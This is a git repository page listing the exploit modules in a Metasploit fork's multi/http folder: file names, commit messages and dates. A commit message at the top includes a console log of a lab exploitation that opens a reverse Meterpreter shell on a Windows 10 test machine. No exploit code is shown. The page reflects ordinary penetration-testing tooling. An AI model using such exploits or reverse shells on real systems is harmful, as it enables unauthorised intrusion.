adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
df5f4caaae504285665fc7ff8a75e98c4b4df9b1
metasploit-gs/modules/exploits/multi/http
T
History
William Vu df5f4caaae Uncomment PSH target in struts2_rest_xstream 
I'm full of shit. It works.

msf5 exploit(multi/http/struts2_rest_xstream) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Powershell command length: 2467
[*] Sending stage (206403 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:49691) at 2018-08-27 20:00:47 -0500

meterpreter > getuid
Server username: MSEDGEWIN10\IEUser
meterpreter > sysinfo
Computer        : MSEDGEWIN10
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter >
2018-08-27 20:01:00 -05:00
..
activecollab_chat.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
ajaxplorer_checkinstall_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
apache_activemq_upload_jsp.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
apache_jetspeed_file_upload.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
apache_mod_cgi_bash_env_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
apache_roller_ognl_injection.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
apprain_upload_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
atutor_sqli.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
auxilium_upload_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
axis2_deployer.rb
Correct false negative post_auth? status
2018-08-09 23:34:03 -05:00
bassmaster_js_injection.rb
Fix #9307, credit to @r0610205
2017-12-18 03:55:01 -06:00
bolt_file_upload.rb
Revised 88 aux and exploit modules to add CVEs / references
2018-07-12 17:34:52 -05:00
builderengine_upload_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
caidao_php_backdoor_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
cisco_dcnm_upload.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
clipbucket_fileupload_exec.rb
Revised 88 aux and exploit modules to add CVEs / references
2018-07-12 17:34:52 -05:00
cmsms_upload_rename_rce.rb
Register files on same line
2018-07-31 10:03:59 -05:00
coldfusion_rds.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
cups_bash_env_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
cuteflow_upload_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
dexter_casinoloader_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
drupal_drupageddon.rb
Fix #9215, minor style nitpick
2018-01-03 23:11:51 -06:00
eaton_nsm_code_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
eventlog_file_upload.rb
40% done
2017-08-28 20:17:58 -04:00
extplorer_upload_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
familycms_less_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
freenas_exec_raw.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
gestioip_exec.rb
Correct false negative post_auth? status
2018-08-09 23:34:03 -05:00
git_client_command_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
git_submodule_command_exec.rb
update style
2017-08-29 17:44:39 -05:00
gitlab_shell_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
gitlist_arg_injection.rb
Land #10278, gitlist_arg_injection fixes
2018-07-12 19:03:52 -05:00
gitorious_graph.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
glassfish_deployer.rb
Update auth requirement for json metadata
2018-08-07 16:42:00 -05:00
glossword_upload_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
glpi_install_rce.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
horde_href_backdoor.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
hp_sitescope_issuesiebelcmd.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
hp_sitescope_uploadfileshandler.rb
Revised 88 aux and exploit modules to add CVEs / references
2018-07-12 17:34:52 -05:00
hp_sys_mgmt_exec.rb
Correct false negative post_auth? status
2018-08-09 23:34:03 -05:00
hyperic_hq_script_console.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
ibm_openadmin_tool_soap_welcomeserver_exec.rb
Add IBM OpenAdmin Tool SOAP welcomeServer PHP Code Execution module
2017-05-31 13:00:35 +00:00
ispconfig_php_exec.rb
40% done
2017-08-28 20:17:58 -04:00
jboss_bshdeployer.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
jboss_deploymentfilerepository.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
jboss_invoke_deploy.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
jboss_maindeployer.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
jboss_seam_upload_exec.rb
40% done
2017-08-28 20:17:58 -04:00
jenkins_script_console.rb
Correct false negative post_auth? status
2018-08-09 23:34:03 -05:00
jenkins_xstream_deserialize.rb
Add ARCH_CMD and general fixup
2018-02-26 16:59:36 -05:00
jira_hipchat_template.rb
Correct false negative post_auth? status
2018-08-09 23:34:03 -05:00
joomla_http_header_rce.rb
40% done
2017-08-28 20:17:58 -04:00
kordil_edms_upload_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
lcms_php_exec.rb
Revised 88 aux and exploit modules to add CVEs / references
2018-07-12 17:34:52 -05:00
log1cms_ajax_create_folder.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
magento_unserialize.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
makoserver_cmd_exec.rb
Bump ranking to Excellent
2017-11-15 15:00:47 -06:00
manage_engine_dc_pmp_sqli.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
manageengine_auth_upload.rb
40% done
2017-08-28 20:17:58 -04:00
manageengine_sd_uploader.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
manageengine_search_sqli.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
mantisbt_manage_proj_page_rce.rb
store credential, use vprints
2018-05-09 11:50:07 -05:00
mantisbt_php_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
mediawiki_syntaxhighlight.rb
Correct false negative post_auth? status
2018-08-09 23:34:03 -05:00
mediawiki_thumb.rb
40% done
2017-08-28 20:17:58 -04:00
metasploit_static_secret_key_base.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
metasploit_webui_console_command_execution.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
mma_backdoor_upload.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
mobilecartly_upload_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
monstra_fileupload_exec.rb
changed grammar, removed redundant code
2018-07-10 14:13:57 -05:00
moodle_cmd_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
movabletype_upgrade_exec.rb
40% done
2017-08-28 20:17:58 -04:00
mutiny_subnetmask_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
nas4free_php_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
netwin_surgeftp_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
nibbleblog_file_upload.rb
Revised 88 aux and exploit modules to add CVEs / references
2018-07-12 17:34:52 -05:00
novell_servicedesk_rce.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
op5_license.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
op5_welcome.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
openfire_auth_bypass.rb
Update false negatives on post auth information
2018-08-20 15:43:07 -05:00
openmediavault_cmd_exec.rb
40% done
2017-08-28 20:17:58 -04:00
openx_backdoor_php.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
opmanager_socialit_file_upload.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
oracle_ats_file_upload.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
oracle_reports_rce.rb
40% done
2017-08-28 20:17:58 -04:00
oracle_weblogic_wsat_deserialization_rce.rb
Update payload and disable check functionality
2018-01-18 13:26:44 -05:00
orientdb_exec.rb
Revised 88 aux and exploit modules to add CVEs / references
2018-07-12 17:34:52 -05:00
oscommerce_installer_unauth_code_exec.rb
oscommerce msftidy fix
2018-06-26 08:21:10 -05:00
pandora_upload_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
phoenix_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
php_cgi_arg_injection.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
php_utility_belt_rce.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
php_volunteer_upload_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
phpfilemanager_rce.rb
Revised 88 aux and exploit modules to add CVEs / references
2018-07-12 17:34:52 -05:00
phpldapadmin_query_engine.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
phpmailer_arg_injection.rb
Update phpmailer_arg_injection.rb
2017-08-24 00:29:28 -06:00
phpmoadmin_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
phpmyadmin_3522_backdoor.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
phpmyadmin_lfi_rce.rb
Additional path for Linux target
2018-08-24 07:18:24 -05:00
phpmyadmin_null_termination_exec.rb
Fix msftdiy EDB link check
2018-08-26 04:18:38 +00:00
phpmyadmin_preg_replace.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
phpscheduleit_start_date.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
phptax_exec.rb
40% done
2017-08-28 20:17:58 -04:00
phpwiki_ploticus_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
playsms_filename_exec.rb
store credentials
2018-05-07 07:26:28 -05:00
playsms_uploadcsv_exec.rb
Fix indentation, documentation update
2018-05-07 09:22:21 -05:00
plone_popen2.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
pmwiki_pagelist.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
polarcms_upload_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
processmaker_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
processmaker_plugin_upload.rb
Remove require statement
2018-04-03 12:56:06 +00:00
qdpm_upload_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
rails_actionpack_inline_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
rails_dynamic_render_code_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
rails_json_yaml_code_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
rails_secret_deserialization.rb
Fix CVE numbers
2018-07-09 13:22:08 -05:00
rails_web_console_v2_code_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
rails_xml_yaml_code_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
rocket_servergraph_file_requestor_rce.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
sflog_upload_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
simple_backdoors_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
sit_file_upload.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
snortreport_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
solarwinds_store_manager_auth_filter.rb
Revised 88 aux and exploit modules to add CVEs / references
2018-07-12 17:34:52 -05:00
sonicwall_gms_upload.rb
40% done
2017-08-28 20:17:58 -04:00
sonicwall_scrutinizer_methoddetail_sqli.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
splunk_mappy_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
splunk_upload_app_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
spree_search_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
spree_searchlogic_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
struts2_code_exec_showcase.rb
Clean up module
2018-05-16 05:39:17 -05:00
struts2_content_type_ognl.rb
40% done
2017-08-28 20:17:58 -04:00
struts2_rest_xstream.rb
Uncomment PSH target in struts2_rest_xstream
2018-08-27 20:01:00 -05:00
struts_code_exec_classloader.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
struts_code_exec_exception_delegator.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
struts_code_exec_parameters.rb
Move EXE generation in struts_code_exec_parameters
2018-05-16 06:15:40 -05:00
struts_code_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
struts_default_action_mapper.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
struts_dev_mode.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
struts_dmi_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
struts_dmi_rest_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
struts_include_params.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
stunshell_eval.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
stunshell_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
sun_jsws_dav_options.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
sysaid_auth_file_upload.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
sysaid_rdslogs_file_upload.rb
55 pages of spelling done
2017-09-07 21:18:50 -04:00
testlink_upload_exec.rb
Revised 88 aux and exploit modules to add CVEs / references
2018-07-12 17:34:52 -05:00
tomcat_jsp_upload_bypass.rb
more style cleanup for tomcat_jsp_upload_bypass
2017-10-11 15:53:35 -05:00
tomcat_mgr_deploy.rb
Update false negatives on post auth information
2018-08-20 15:43:07 -05:00
tomcat_mgr_upload.rb
Update false negatives on post auth information
2018-08-20 15:43:07 -05:00
traq_plugin_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
trendmicro_threat_discovery_admin_sys_time_cmdi.rb
55 pages of spelling done
2017-09-07 21:18:50 -04:00
uptime_file_upload_1.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
uptime_file_upload_2.rb
55 pages of spelling done
2017-09-07 21:18:50 -04:00
v0pcr3w_exec.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
vbseo_proc_deutf.rb
Update CVE references for exploit modules
2018-07-08 18:46:04 -05:00
vbulletin_unserialize.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
visual_mining_netcharts_upload.rb
Update false negatives on post auth information
2018-08-20 15:43:07 -05:00
vtiger_install_rce.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
vtiger_logo_upload_exec.rb
Change option type
2018-07-30 12:15:59 -05:00
vtiger_php_exec.rb
Minor tweaks...
2017-09-08 10:04:47 -05:00
vtiger_soap_upload.rb
55 pages of spelling done
2017-09-07 21:18:50 -04:00
webnms_file_upload.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
webpagetest_upload_exec.rb
55 pages of spelling done
2017-09-07 21:18:50 -04:00
werkzeug_debug_rce.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
wikka_spam_exec.rb
55 pages of spelling done
2017-09-07 21:18:50 -04:00
wp_ninja_forms_unauthenticated_file_upload.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
wp_responsive_thumbnail_slider_upload.rb
Update module and its documentation
2018-07-26 23:08:20 -05:00
x7chat2_php_exec.rb
Revised 88 aux and exploit modules to add CVEs / references
2018-07-12 17:34:52 -05:00
zabbix_script_exec.rb
55 pages of spelling done
2017-09-07 21:18:50 -04:00
zemra_panel_rce.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
zenworks_configuration_management_upload.rb
use https for metaploit.com links
2017-07-24 06:26:21 -07:00
zenworks_control_center_upload.rb
55 pages of spelling done
2017-09-07 21:18:50 -04:00
zpanel_information_disclosure_rce.rb
55 pages of spelling done
2017-09-07 21:18:50 -04:00